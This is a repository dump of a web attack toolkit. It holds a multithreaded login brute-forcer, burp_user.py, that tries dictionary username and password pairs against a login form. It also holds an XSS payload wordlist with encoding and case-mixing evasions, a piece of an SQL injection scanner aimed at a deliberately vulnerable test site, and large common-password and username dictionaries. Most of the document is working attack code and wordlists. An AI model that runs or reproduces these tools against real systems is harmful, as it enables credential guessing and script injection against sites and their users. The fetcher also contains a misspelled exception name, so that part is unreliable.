27 |         'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246'
28 |     },
29 |     {
30 |         'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'
31 |     },
32 |     {
33 |         'User-Agent': 'Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0'
34 |     },
35 |     {
36 |         'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko/20100101 Firefox/33.0'
37 |     },
38 |     {
39 |         'User-Agent': 'Mozilla/5.0 (X11; Linux i586; rv:31.0) Gecko/20100101 Firefox/31.0'
40 |     },
41 |     {
42 |         'User-Agent': 'Mozilla/5.0 (X11; OpenBSD amd64; rv:28.0) Gecko/20100101 Firefox/28.0'
43 |     },
44 |     {
45 |         'User-Agent': 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.1 (KHTML, like Gecko) Maxthon/3.0.8.2 Safari/533.1'
46 |     },
47 |     {
48 |         'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A'
49 |     },
50 |     {
51 |         'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.13+ (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2'
52 |     }
53 | ]
54 | 
55 | if __name__ == '__main__':
56 |     print(get())


--------------------------------------------------------------------------------
/Sqliscan/web.py:
--------------------------------------------------------------------------------
 1 | #coding ='utf-8'
 2 | 
 3 | import urllib.request,urllib.error,urllib.parse
 4 | from Sqliscan import useragents
 5 | 
 6 | def gethtml(url, lastURL=False):
 7 |     """
 8 |     给定url返回html
 9 |     :param url:
10 |     :param lastURL:
11 |     :return: HTML或False
12 |     """
13 |     #对url的预处理
14 |     if not (url.startswith("http://") or url.startswith("https://")):
15 |         url = "http://"+url
16 |     header = useragents.get()
17 |     request = urllib.request.Request(url, None, header)
18 |     html = None
19 | 
20 |     try:
21 |         response = urllib.request.urlopen(request,timeout=10)
22 |     except urllib.HTPPError as e:
23 |         #返回500
24 |         if e.getcode() == 500:
25 |             html = e.read()
26 |         pass
27 |     except urllib.URLError as e:
28 |         pass
29 | 
30 |     except Exception as e0:
31 |         raise  e0
32 | 
33 |     except:
34 |         pass
35 | 
36 |     else:
37 |         html = response.read()
38 |         if html:
39 |             if lastURL == True:
40 |                 return (html, response.url)
41 |             else:
42 |                 return html
43 |     return False
44 | 
45 | 
46 | if __name__ == '__main__':
47 |     html = gethtml("http://testphp.vulnweb.com:80/listproducts.php?cat=1")
48 |     print(html)


--------------------------------------------------------------------------------
/XSS_payload/wordlist.txt:
--------------------------------------------------------------------------------
 1 | <script>alert(1)</script>
 2 | </script>"><script>prompt(1)</script>
 3 | </ScRiPt>"><ScRiPt>prompt(1)</ScRiPt>
 4 | "><img src=x onerror=prompt(1)>
 5 | "><svg/onload=prompt(1)>
 6 | "><iframe/src=javascript:prompt(1)>
 7 | "><h1 onclick=prompt(1)>Clickme</h1>
 8 | "><a href=javascript:prompt(1)>Clickme</a>
 9 | "><a href="javascript:confirm%28 1%29">Clickme</a>
10 | "><a href="data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+">click</a>
11 | "><textarea autofocus onfocus=prompt(1)>
12 | "><a/href=javascript&colon;co\u006efir\u006d&#40;&quot;1&quot;&#41;>clickme</a>
13 | "><script>co\u006efir\u006d`1`</script>
14 | "><ScRiPt>co\u006efir\u006d`1`</ScRiPt>
15 | "><img src=x onerror=co\u006efir\u006d`1`>
16 | "><svg/onload=co\u006efir\u006d`1`>
17 | "><iframe/src=javascript:co\u006efir\u006d%28 1%29>
18 | "><h1 onclick=co\u006efir\u006d(1)>Clickme</h1>
19 | "><a href=javascript:prompt%28 1%29>Clickme</a>
20 | "><a href="javascript:co\u006efir\u006d%28 1%29">Clickme</a>
21 | "><textarea autofocus onfocus=co\u006efir\u006d(1)>
22 | "><details/ontoggle=co\u006efir\u006d`1`>clickmeonchrome
23 | "><p/id=1%0Aonmousemove%0A=%0Aconfirm`1`>hoveme
24 | "><img/src=x%0Aonerror=prompt`1`>
25 | "><iframe srcdoc="&lt;img src&equals;x:x onerror&equals;alert&lpar;1&rpar;&gt;">
26 | "><h1/ondrag=co\u006efir\u006d`1`)>DragMe</h1>
27 | 


--------------------------------------------------------------------------------
/burp_user.py:
--------------------------------------------------------------------------------
 1 | import requests
 2 | import threading
 3 | import time
 4 | import redis
 5 | 
 6 | headers ={
 7 |     'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML,'
 8 |                   ' like Gecko) Chrome/63.0.3239.84 Safari/537.36',
 9 |     'Cache-Control': 'max-age=0',
10 |     'Upgrade-Insecure-Requests': '1',
11 |     'Content-Type': 'application/x-www-form-urlencoded',
12 |     'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
13 |     'Accept-Encoding': 'gzip, deflate',
14 |     'Accept-Language': 'zh-CN,zh;q=0.9,ja;q=0.8',
15 | }
16 | 
17 | 
18 | class BurpUser:
19 |     def __init__(self, url, savepool, u_p='username', p_p='password'):
20 |         self.threadnum = 100
21 |         self.url = url
22 |         self.user_param = u_p
23 |         self.pass_param = p_p
24 |         self.threadmax = threading.BoundedSemaphore(self.threadnum)
25 |         self.savepool = savepool
26 |         self.finished = False
27 |         self.redis_connnect()
28 | 
29 |     def load_dict(self):
30 |         self.user = [i.strip('\n') for i in open('dict/user.txt', encoding='utf-8').readlines()]
31 |         self.password = [i.strip('\n') for i in open('dict/password.txt', encoding='utf-8').readlines()]
32 | 
33 |     def request_one(self, user, password, sp_dict,len_cont):
34 |         data = {self.user_param:user, self.pass_param: password}
35 |         try:
36 |             r = requests.post(self.url, data=data, headers=headers)
37 |             if len(r.content) != self.default_length:
38 |                 print('[Success] I found it  username - %s | password %s' % (user, password))
39 |                 sp_dict[user] = password
40 |                 len_cont.append(len(r.content))
41 |                 self.found = True
42 |                 self.burp_user_args.hset('burp_user', 'user', user)
43 |                 self.burp_user_args.hset('burp_user', 'password', password)
44 |                
45 |         except Exception as e:
46 |             print('[Warning] timeout, the thread will be restart after 10s ')
47 |             print(e)
48 |             time.sleep(10)
49 |         self.threadmax.release()
50 | 
51 |     def burp(self):
52 |         th = []
53 |         special_dict = {}
54 |         content = []
55 |         for _ in self.user:
56 |             i = self.user.pop()
57 |             for j in self.password:
58 |                 if self.found: return
59 |                 self.threadmax.acquire()
60 |                 t = threading.Thread(target=self.request_one, args=(i, j, special_dict, content))
61 |                 t.start()
62 |                 th.append(t)
63 | 
64 |         for t in th:
65 |             t.join()
66 | 
67 |     def is_finished(self):
68 |         return self.finished
69 | 
70 |     def redis_connnect(self):
71 |         self.burp_user_redis = redis.Redis(connection_pool=self.savepool)
72 |         
73 |     def run(self):
74 |         self.action = self.burp_user_redis.hget('base', 'burp_user_args')    
75 |         if self.action == 'burp':
76 |             self.load_dict()
77 |             if self.url:
78 |                 self.url = self.burp_user_redis.hget('base', 'login_url')
79 |             self.default_length = len(requests.post(self.url, headers=headers,
80 |                                             data={self.user_param: '', self.pass_param: ''}).content)
81 |             self.burp()
82 |             
83 | 
84 | if __name__ == '__main__':
85 |     save_pool = redis.ConnectionPool(host='127.0.0.1', port=6379, decode_responses=True)
86 |     burp = BurpUser('http://127.0.0.1/index.php', savepool=save_pool)
87 |     
88 |     
89 | 
90 | 


--------------------------------------------------------------------------------
/data.txt:
--------------------------------------------------------------------------------
1 | URL:http://www.andseclab.cn
2 | 
3 | 
4 | 
5 | Url_Spider:
6 | --------------------------------------
7 | 1:http://www.andseclab.cn#content
8 | 2:http://www.andseclab.cn
9 | 


--------------------------------------------------------------------------------
/data1.txt:
--------------------------------------------------------------------------------
1 | URL:http://testphp.vulnweb.com
2 | 
3 | 
4 | 
5 | the_harvest:
6 | --------------------------------------
7 | 1:  domain:testhtml5.vulnweb.com    mail:'@vulnweb.com
8 | 


--------------------------------------------------------------------------------
/dict/password.txt:
--------------------------------------------------------------------------------
   1 | 123456
   2 | admin
   3 | 123456789
   4 | 12345678
   5 | 111111
   6 | {user}
   7 | {username}
   8 | {user_name}
   9 | {admin_name}
  10 | {user}123
  11 | {username}123
  12 | {user_name}123
  13 | {admin_name}123
  14 | {user}123456
  15 | {username}123456
  16 | {user_name}123456
  17 | {admin_name}123456
  18 | {user}@123
  19 | {username}@123
  20 | {user_name}@123
  21 | {admin_name}@123
  22 | 000000
  23 | 11111111
  24 | 00000000
  25 | 123123123
  26 | 1234567890
  27 | 88888888
  28 | 111111111
  29 | 147258369
  30 | 987654321
  31 | aaaaaaaa
  32 | 1111111111
  33 | xiazhili
  34 | 66666666
  35 | 11223344
  36 | a123456789
  37 | 1qaz2wsx
  38 | 789456123
  39 | qqqqqqqq
  40 | 87654321
  41 | password
  42 | 000000000
  43 | qwertyuiop
  44 | 31415926
  45 | iloveyou
  46 | qq123456
  47 | 0000000000
  48 | 12344321
  49 | asdfghjkl
  50 | 1q2w3e4r
  51 | 12121212
  52 | 0123456789
  53 | 123654789
  54 | qazwsxedc
  55 | abcd1234
  56 | 12341234
  57 | 123456abc
  58 | 110110110
  59 | abc123456
  60 | 22222222
  61 | 1234qwer
  62 | a12345678
  63 | 123321123
  64 | asdasdasd
  65 | 123456123
  66 | qwertyui
  67 | a1234567
  68 | 123456789a
  69 | 99999999
  70 | 999999999
  71 | asdfasdf
  72 | 123456aa
  73 | 123456123456
  74 | aa123456
  75 | 963852741
  76 | 55555555
  77 | 520520520
  78 | 741852963
  79 | 33333333
  80 | qwer1234
  81 | asd123456
  82 | 77777777
  83 | 05962514787
  84 | 11112222
  85 | kingcom5
  86 | 111222333
  87 | zzzzzzzz
  88 | 3.1415926
  89 | qweasdzxc
  90 | qweqweqwe
  91 | 123456qq
  92 | 1123581321
  93 | asdf1234
  94 | 123698745
  95 | 521521521
  96 | 147852369
  97 | asdfghjk
  98 | code8925
  99 | q1w2e3r4
 100 | 12345678a
 101 | 1234abcd
 102 | woaiwojia
 103 | woaini1314
 104 | 123qweasd
 105 | 1qazxsw2
 106 | 0987654321
 107 | 321321321
 108 | 5845201314
 109 | lilylily
 110 | wwwwwwww
 111 | 123456987
 112 | 11235813
 113 | zxcvbnm123
 114 | 1q2w3e4r5t
 115 | google250
 116 | 123321aa
 117 | 123456asd
 118 | 10101010
 119 | 12345600
 120 | 1234554321
 121 | 12345612
 122 | woshishui
 123 | 11111111111111111111
 124 | xiaoxiao
 125 | 5201314520
 126 | qwe123456
 127 | wojiushiwo
 128 | 123456654321
 129 | 12369874
 130 | 12301230
 131 | 1234567b
 132 | 12345679
 133 | ffffffff
 134 | 1122334455
 135 | woaini123
 136 | 100200300
 137 | 44444444
 138 | ssssssss
 139 | qazwsx123
 140 | 1234567a
 141 | buzhidao
 142 | z123456789
 143 | 1357924680
 144 | woainima
 145 | 123456aaa
 146 | 25257758
 147 | yangyang
 148 | 321654987
 149 | csdncsdn
 150 | woaini520
 151 | aaa123456
 152 | 369258147
 153 | 5845211314
 154 | 299792458
 155 | 9876543210
 156 | 369369369
 157 | q123456789
 158 | 20082008
 159 | zhang123
 160 | dddddddd
 161 | qwerasdf
 162 | 12qwaszx
 163 | 12345678910
 164 | 8888888888
 165 | aaaaaaaaa
 166 | 888888888
 167 | wiii2dsE
 168 | 135792468
 169 | goodluck
 170 | wocaonima
 171 | a1111111
 172 | 168168168
 173 | abcdefgh
 174 | 789789789
 175 | 66668888
 176 | 1233211234567
 177 | qaz123456
 178 | computer
 179 | 007007007
 180 | 123456qwe
 181 | 112233445566
 182 | abc12345
 183 | zxc123456
 184 | qq123123
 185 | 147896325
 186 | zxczxczxc
 187 | newhappy
 188 | a1b2c3d4
 189 | qq111111
 190 | sunshine
 191 | 00001111
 192 | xxxxxxxx
 193 | 52013145201314
 194 | zaq12wsx
 195 | 123321123321
 196 | lb851210
 197 | qqq11111
 198 | helloworld
 199 | wodemima
 200 | as123456
 201 | 1a2b3c4d
 202 | 123789456
 203 | superman
 204 | 110120119
 205 | zhangwei
 206 | 584131421
 207 | 123456789.
 208 | 20092009
 209 | 12345qwert
 210 | aptx4869
 211 | aaaaaaaaaa
 212 | 13145200
 213 | 77585210
 214 | aaaa1111
 215 | 123456ab
 216 | 666666666
 217 | 12348765
 218 | tiantian
 219 | 123456..
 220 | 12312312
 221 | jingjing
 222 | 123456789q
 223 | li123456
 224 | 20080808
 225 | tzwadmin123
 226 | 1234512345
 227 | abcd123456
 228 | hyjzstx8
 229 | a123123123
 230 | wangjian
 231 | a5201314
 232 | 13141314
 233 | a123456a
 234 | 20102010
 235 | qw123456
 236 | 23232323
 237 | w123456789
 238 | 12345687
 239 | 456456456
 240 | 01020304
 241 | shanghai
 242 | 7894561230
 243 | 01234567
 244 | 12345abcde
 245 | QWERTYUIOP
 246 | 19491001
 247 | 14789632
 248 | 123123123123
 249 | 3141592653
 250 | ab123456
 251 | AAAAAAAA
 252 | 5841314520
 253 | 01010101
 254 | 77585211
 255 | p@ssw0rd
 256 | 111111
 257 | a11111111
 258 | 012345678
 259 | dongdong
 260 | justdoit
 261 | yuanyuan
 262 | csdn.net
 263 | 123454321
 264 | P@ssw0rd
 265 | qazqazqaz
 266 | 7758521521
 267 | 123456as
 268 | q1w2e3r4t5
 269 | hahahaha
 270 | 45612300
 271 | woaini521
 272 | aa123123
 273 | 77585217758521
 274 | wang123456
 275 | 23456789
 276 | 13131313
 277 | 110119120
 278 | zhanglei
 279 | 88889999
 280 | 74108520
 281 | 123qwe123
 282 | 123456zx
 283 | worinima
 284 | aaa123123
 285 | 77889900
 286 | 123456000
 287 | 518518518
 288 | 111111aa
 289 | 584131420
 290 | 12365478
 291 | 1111qqqq
 292 | wangjing
 293 | 11111111a
 294 | qwert12345
 295 | meiyoumima
 296 | 11110000
 297 | q1234567
 298 | 258258258
 299 | qq000000
 300 | mingming
 301 | liu123456
 302 | 987456321
 303 | 52013141314
 304 | 123456798
 305 | 1234567890123
 306 | qazxswedc
 307 | zz123456
 308 | chenchen
 309 | 25251325
 310 | qqqqqqqqqq
 311 | aini1314
 312 | 333333333
 313 | 911911911
 314 | 21212121
 315 | 123456abcd
 316 | llllllll
 317 | 10203040
 318 | 560111aa
 319 | 52013140
 320 | q1111111
 321 | 1234asdf
 322 | zx123456
 323 | woailaopo
 324 | 1237890o0
 325 | 123123aa
 326 | abc123456789
 327 | qq123456789
 328 | q12345678
 329 | ASDFGHJKL
 330 | asasasas
 331 | 78787878
 332 | 5201314a
 333 | nicholas
 334 | admin123
 335 | 55667788
 336 | 120120120
 337 | 1234567899
 338 | wangwang
 339 | qq5201314
 340 | 1qaz1qaz
 341 | 12332100
 342 | 123123456
 343 | dg123456
 344 | 16897168
 345 | xiaolong
 346 | passw0rd
 347 | mmmmmmmm
 348 | jjjjjjjj
 349 | a1s2d3f4
 350 | 99998888
 351 | 66778899
 352 | 00000000000000000000
 353 | support123
 354 | wangpeng
 355 | administrator
 356 | a0000000
 357 | 1QAZ2WSX
 358 | zxcv1234
 359 | zaiwa1124
 360 | w12345678
 361 | longlong
 362 | pppppppp
 363 | kkkkkkkk
 364 | xingxing
 365 | 1223334444
 366 | wangyang
 367 | abcde12345
 368 | a00000000
 369 | 13572468
 370 | 123456qaz
 371 | lovelove
 372 | 12131415
 373 | qweasd123
 374 | love1314
 375 | asdf123456
 376 | qwerty123
 377 | 12300000
 378 | 1111aaaa
 379 | qqqqqqqqq
 380 | hhhhhhhh
 381 | 1314520520
 382 | nihao123
 383 | miaomiao
 384 | 3141592654
 385 | 00123456
 386 | qwe123123
 387 | liangliang
 388 | Aa123456
 389 | xiaoqiang
 390 | qwe12345
 391 | hello123
 392 | cccccccc
 393 | asdfjkl;
 394 | zhanghao
 395 | 121121121
 396 | 112112112
 397 | www123456
 398 | testtest
 399 | A123456789
 400 | 3366994qaz
 401 | 200401265
 402 | 1111111a
 403 | zhimakaimen
 404 | zhangjie
 405 | asd12345
 406 | 56565656
 407 | 456789123
 408 | 456123789
 409 | 119119119
 410 | 111111qq
 411 | yyyyyyyy
 412 | QAZWSXEDC
 413 | q11111111
 414 | abc12345678
 415 | 84131421
 416 | 6666666666
 417 | 222222222
 418 | oooooooo
 419 | xiaofeng
 420 | woshitiancai
 421 | qwqwqwqw
 422 | imissyou
 423 | gggggggg
 424 | baidu1599
 425 | 00112233
 426 | internet
 427 | 13324016206
 428 | zhangjian
 429 | mm123456
 430 | 98989898
 431 | 83869247
 432 | 1qaz2wsx3edc
 433 | 123456qw
 434 | shanshan
 435 | jack123456
 436 | 123456ok
 437 | 100100100
 438 | wobuzhidao
 439 | 98765432
 440 | 5555555555
 441 | 314159265
 442 | 123456789abc
 443 | 1212121212
 444 | zhongguo
 445 | zhangjing
 446 | woainiwoaini
 447 | microsoft
 448 | 123581321
 449 | 11221122
 450 | 789654123
 451 | 5201314123
 452 | 12345689
 453 | 123456780
 454 | qqqq1111
 455 | 159159159
 456 | 1029384756
 457 | tingting
 458 | dingding
 459 | 147147147
 460 | 123456789123
 461 | 001001001
 462 | z1234567
 463 | wangchao
 464 | tsinghua
 465 | huanhuan
 466 | 5841314521
 467 | 11111111111
 468 | 89898989
 469 | 123456bb
 470 | zaq1xsw2
 471 | 555555555
 472 | 123abc123
 473 | 123456456
 474 | 369852147
 475 | amuqdedwft
 476 | 963258741
 477 | 1q1q1q1q
 478 | 12312300
 479 | rongfan66
 480 | 58585858
 481 | 31496081
 482 | 110120130
 483 | z12345678
 484 | windowsxp
 485 | china6815
 486 | 1231512315
 487 | cs123456
 488 | 88886666
 489 | 14141414
 490 | 13145201314520
 491 | woshishei
 492 | jianqiao
 493 | 123654123
 494 | chinaren
 495 | 1qaz@WSX
 496 | 12345611
 497 | 520131400
 498 | 12345678q
 499 | handsome
 500 | 789632145
 501 | 123456zz
 502 | 12332112
 503 | qwerqwer
 504 | l12345678
 505 | a1314520
 506 | 68686868
 507 | w1234567
 508 | 123123qq
 509 | chenjian
 510 | asdfzxcv
 511 | 159357159357
 512 | 09090909
 513 | 584201314
 514 | 123456...
 515 | wangyong
 516 | wang1234
 517 | lingling
 518 | cc123456
 519 | 10002000
 520 | 09876543
 521 | zhangyan
 522 | qwertyuio
 523 | 777888999
 524 | 100200100200
 525 | beijing2008
 526 | 7758521520
 527 | 16899168
 528 | 123456321
 529 | 27105821
 530 | 159753123
 531 | 123456789z
 532 | haohaoxuexi
 533 | 123456asdf
 534 | 05413330
 535 | zhanghui
 536 | huang123
 537 | 20052005
 538 | zhangyang
 539 | wo123456
 540 | 301415926
 541 | 21876346a
 542 | 159357123
 543 | 123698741
 544 | 123456qwerty
 545 | rilidongl
 546 | 13141516
 547 | zxcvbnm1
 548 | msconfig
 549 | jiangnan
 550 | abcabcabc
 551 | 18181818
 552 | 0.123456
 553 | wangying
 554 | tttttttt
 555 | qawsedrf
 556 | kingking
 557 | admin888
 558 | 55556666
 559 | 123qweasdzxc
 560 | 12345abc
 561 | 1111111q
 562 | zxcvbnma
 563 | woaiwoziji
 564 | operation
 565 | nclpf2p4
 566 | asd123123
 567 | zhangjun
 568 | ABC123456
 569 | 90909090
 570 | 78963214
 571 | 123456789qaz
 572 | zhangtao
 573 | woshishen
 574 | 134679852
 575 | wiiisa222
 576 | l123456789
 577 | chen123456
 578 | 99887766
 579 | 777777777
 580 | 2222222222
 581 | 11111112
 582 | QQQQQQQQ
 583 | nishishui
 584 | Fuyume123
 585 | 12345677
 586 | 12345671
 587 | niaishui
 588 | 123456zxc
 589 | 123456788
 590 | 00000001
 591 | ........
 592 | ww123456
 593 | dgdg7234322
 594 | 13149286ab
 595 | 123654987
 596 | QWERTYUI
 597 | qingqing
 598 | 333666999
 599 | zxcvbnmzxcvbnm
 600 | yy123456
 601 | woaimama
 602 | qwe123qwe
 603 | 1234567q
 604 | 123321456
 605 | 00009999
 606 | yingying
 607 | xiaoming
 608 | 51201314
 609 | 123456ABC
 610 | 123456789@
 611 | 12345654321
 612 | 10000000
 613 | windows123
 614 | wangliang
 615 | 9999999999
 616 | 9638527410
 617 | 125125125
 618 | 001002003
 619 | zhangpeng
 620 | nishizhu
 621 | huangjie
 622 | goo78leeg
 623 | asdfgh123
 624 | 741258963
 625 | 55665566
 626 | 31415926535
 627 | zhangzhang
 628 | woshizhu
 629 | wanggang
 630 | poiuytrewq
 631 | liuqiang
 632 | ABCD1234
 633 | a7758521
 634 | 7708801314520
 635 | 192837465
 636 | 159357456
 637 | 12345678900
 638 | QQ123456
 639 | asdffdsa
 640 | aa111111
 641 | zxzxzxzx
 642 | bbbbbbbb
 643 | 65432100
 644 | 123456789qq
 645 | zhangqiang
 646 | 111111111111
 647 | wangdong
 648 | hao123456
 649 | fangfang
 650 | 85208520
 651 | 12356789
 652 | qweqwe123
 653 | howareyou
 654 | bugaosuni
 655 | abcdefg123
 656 | abc123abc
 657 | 700629gh
 658 | 21345678
 659 | 1qa2ws3ed
 660 | wangzhen
 661 | ss123456
 662 | f19841205
 663 | asdfqwer
 664 | 7215217758991
 665 | 25252525
 666 | 1415926535
 667 | 123456789+
 668 | 01230123
 669 | zxcvbnmm
 670 | wangfeng
 671 | songaideng
 672 | mengmeng
 673 | download
 674 | qianqian
 675 | 159753159753
 676 | 1234567891
 677 | zhangkai
 678 | yu123456
 679 | jiaojiao
 680 | huangwei
 681 | 74107410
 682 | 10241024
 683 | 000123456
 684 | 00000000a
 685 | zhangxin
 686 | zhangbin
 687 | zaqxswcde
 688 | xj123456
 689 | wangning
 690 | test1234
 691 | stefanie
 692 | jianjian
 693 | fengfeng
 694 | 7758521a
 695 | 20090909
 696 | 12332111
 697 | x123456789
 698 | supervisor
 699 | qwert123
 700 | cyq721225
 701 | 95279527
 702 | 52113145211314
 703 | 52001314
 704 | 3.141592653
 705 | 20202020
 706 | 12345666
 707 | zxcasdqwe
 708 | bingbing
 709 | asdqwe123
 710 | asdasd123
 711 | zxcvzxcv
 712 | s2j3l9v5
 713 | qazwsxed
 714 | dangyuan
 715 | abc123123
 716 | 584211314
 717 | 12345670
 718 | 000000
 719 | zhangliang
 720 | qaz12345
 721 | pengpeng
 722 | lkjhgfdsa
 723 | ILOVEYOU
 724 | cndkervip
 725 | 1a2s3d4f
 726 | 13145210
 727 | xiaodong
 728 | wangmeng
 729 | 987987987
 730 | 5205201314
 731 | 315315315
 732 | 20022002
 733 | 1Q2W3E4R
 734 | 12346789
 735 | 12345688
 736 | yangguang
 737 | xx123456
 738 | wangqiang
 739 | jiushiaini
 740 | huanghao
 741 | csdn123456
 742 | asdfg12345
 743 | 1q2w3e4r5t6y
 744 | 1357913579
 745 | 123456789*
 746 | 1213141516
 747 | zhouzhou
 748 | woshiniba
 749 | s123456789
 750 | qqqqwwww
 751 | adminadmin
 752 | 201314201314
 753 | by7704566
 754 | aabbccdd
 755 | aaaa1234
 756 | 88488848
 757 | 77585211314
 758 | 60200946
 759 | 52013141
 760 | 12345789
 761 | 123456789A
 762 | zzzzzzzzz
 763 | zhendeaini
 764 | yangjing
 765 | yangchao
 766 | yang123456
 767 | xiaojing
 768 | sun123456
 769 | s12345678
 770 | s1234567
 771 | qqq123456
 772 | hao456250
 773 | caonima123
 774 | 77778888
 775 | 123456qqq
 776 | zhang123456
 777 | yang1234
 778 | wangming
 779 | mimamima
 780 | happy123
 781 | abcd12345
 782 | aaaa0000
 783 | 9876543211
 784 | 987412365
 785 | 60729043
 786 | 521224727
 787 | 334205265
 788 | 15151515
 789 | 000000aa
 790 | yaho982er
 791 | xuanxuan
 792 | weiweiwei
 793 | jb85811510
 794 | feixiang
 795 | asdfg123
 796 | 86868686
 797 | 25802580
 798 | 1010101010
 799 | whoareyou
 800 | thankyou
 801 | slamdunk
 802 | jiangwei
 803 | gogogogo
 804 | caonimabi
 805 | 987654123
 806 | 891023hh
 807 | 541881452
 808 | 456852456852
 809 | 36363636
 810 | 20062006
 811 | 175638080
 812 | 16888888
 813 | woshinidie
 814 | rongrong
 815 | pingping
 816 | liujianliu
 817 | football
 818 | asd123asd
 819 | 37213721
 820 | 33445566
 821 | 0.123456789
 822 | tangtang
 823 | chen1234
 824 | amp12345
 825 | abc123abc123
 826 | 53231323
 827 | 5201314.
 828 | 20000000
 829 | 16161616
 830 | 13800138000
 831 | 11111122
 832 | yangjian
 833 | xiaogang
 834 | wonderful
 835 | wangchen
 836 | qwerty123456
 837 | ms0123456
 838 | ll123456
 839 | hhxxttxs
 840 | fdsafdsa
 841 | 7777777777
 842 | 52013145
 843 | 1234QWER
 844 | 123456789123456789
 845 | 123456654
 846 | 09308066
 847 | 0147258369
 848 | yongheng
 849 | xiaojian
 850 | workhard
 851 | kangkang
 852 | 963963963
 853 | 22334455
 854 | 123456ww
 855 | 11211121
 856 | wanghuan
 857 | qq1314520
 858 | laopo521
 859 | hellohello
 860 | csdn1234
 861 | chenfeng
 862 | chenchao
 863 | butterfly
 864 | a1b2c3d4e5
 865 | A1234567
 866 | 5211314521
 867 | 04020323
 868 | zzzzzzzzzz
 869 | shoujiqb
 870 | l1234567
 871 | apple123
 872 | 44556677
 873 | 38183818
 874 | 20082009
 875 | 131452000
 876 | 123123qwe
 877 | 123123321
 878 | zhangchao
 879 | wangshuai
 880 | thinkpad
 881 | songsong
 882 | paradise
 883 | iloveyou1314
 884 | 80808080
 885 | 52105210
 886 | 147896321
 887 | 123123123a
 888 | 1111122222
 889 | zaqwsx123
 890 | xiaoyang
 891 | tongtong
 892 | okokokok
 893 | chenliang
 894 | beautiful
 895 | aaaassss
 896 | 7758521123
 897 | 775852100
 898 | 69696969
 899 | 5201314qq
 900 | 101101101
 901 | zhangming
 902 | xixihaha
 903 | xiangxiang
 904 | woaini11
 905 | sdfsdfsdf
 906 | samleiming
 907 | qazwsx12
 908 | jiarenqb
 909 | foreverlove
 910 | adgjmptw
 911 | A12345678
 912 | 520090025hgb
 913 | 0054444944
 914 | 0000000a
 915 | zhangying
 916 | woainiya
 917 | westlife
 918 | PASSWORD
 919 | Passw0rd
 920 | lin123456
 921 | jiang123
 922 | dirdirdir
 923 | cnforyou
 924 | chenjing
 925 | ASDASDASD
 926 | 22223333
 927 | 1a2b3c4d5e
 928 | 159753456
 929 | 123456789w
 930 | 12342234
 931 | 0.0.0.0.
 932 | wokaonima
 933 | tomorrow
 934 | q1q1q1q1
 935 | kk123456
 936 | fighting
 937 | 96321478
 938 | 3333333333
 939 | 159357258
 940 | 1472583690
 941 | 123456789asd
 942 | tiankong
 943 | qingfeng
 944 | caonimama
 945 | 22446688
 946 | !QAZ2wsx
 947 | xinxin13d
 948 | qq123321
 949 | jianghui
 950 | delphi2009
 951 | bbscsdnnet
 952 | bai18dudu
 953 | APTX4869
 954 | a89400ab
 955 | 96385274
 956 | 520fagnsg
 957 | 51515151
 958 | 20042004
 959 | 19191919
 960 | 123456xx
 961 | 112233112233
 962 | zhangfeng
 963 | lilingjie1102
 964 | huangjian
 965 | a1a1a1a1
 966 | 77582588
 967 | 654321654321
 968 | 630158513
 969 | 546546546
 970 | 54181452
 971 | 52013144
 972 | 15975300
 973 | 123456AA
 974 | 123456789987654321
 975 | 11223300
 976 | zy123456
 977 | zhanghua
 978 | xiaoliang
 979 | wu123456
 980 | woxiangni
 981 | windows98
 982 | software
 983 | lxqqqqqq
 984 | jordan23
 985 | ingtake1
 986 | chenyang
 987 | AA123456
 988 | 99990000
 989 | 891129aaa
 990 | 70701111
 991 | 551648586
 992 | 12345678.
 993 | zhenzhen
 994 | xiaofang
 995 | showmethe
 996 | qq1234567
 997 | ly123456
 998 | kobebryant
 999 | jiangtao
1000 | huanjue321
1001 | goodgood
1002 | accpaccp
1003 | 80238023
1004 | 77887788
1005 | 45454545
1006 | 1314520123
1007 | 110112119
1008 | 11001100
1009 | 0147896325
1010 | zoo-1573
1011 | yongyuan
1012 | xu123456
1013 | wangxiao
1014 | shevchenko
1015 | lj123456
1016 | liang123
1017 | juventus


--------------------------------------------------------------------------------
/dict/user.txt:
--------------------------------------------------------------------------------
   1 | admin
   2 | manager
   3 | manage
   4 | user
   5 | guest
   6 | administrator
   7 | account
   8 | super
   9 | superuser
  10 | master
  11 | www
  12 | web
  13 | webadmin
  14 | webmaster
  15 | anonymous
  16 | a
  17 | an
  18 | able
  19 | about
  20 | above
  21 | abuse
  22 | accept
  23 | accident
  24 | accuse
  25 | across
  26 | act
  27 | activist
  28 | actor
  29 | add
  30 | administration
  31 | admit
  32 | adult
  33 | advertise
  34 | advise
  35 | affect
  36 | afraid
  37 | after
  38 | again
  39 | against
  40 | age
  41 | agency
  42 | aggression
  43 | ago
  44 | agree
  45 | agriculture
  46 | aid
  47 | aim
  48 | air
  49 | airforce
  50 | airplane
  51 | airport
  52 | album
  53 | alcohol
  54 | alive
  55 | all
  56 | ally
  57 | almost
  58 | alone
  59 | along
  60 | already
  61 | also
  62 | although
  63 | always
  64 | ambassador
  65 | amend
  66 | ammunition
  67 | among
  68 | amount
  69 | anarchy
  70 | ancestor
  71 | ancient
  72 | and
  73 | anger
  74 | animal
  75 | anniversary
  76 | announce
  77 | another
  78 | answer
  79 | any
  80 | apologize
  81 | appeal
  82 | appear
  83 | appoint
  84 | approve
  85 | archeology
  86 | area
  87 | argue
  88 | arms
  89 | army
  90 | around
  91 | arrest
  92 | arrive
  93 | art
  94 | artillery
  95 | as
  96 | ash
  97 | ask
  98 | assist
  99 | astronaut
 100 | astronomy
 101 | asylum
 102 | at
 103 | atmosphere
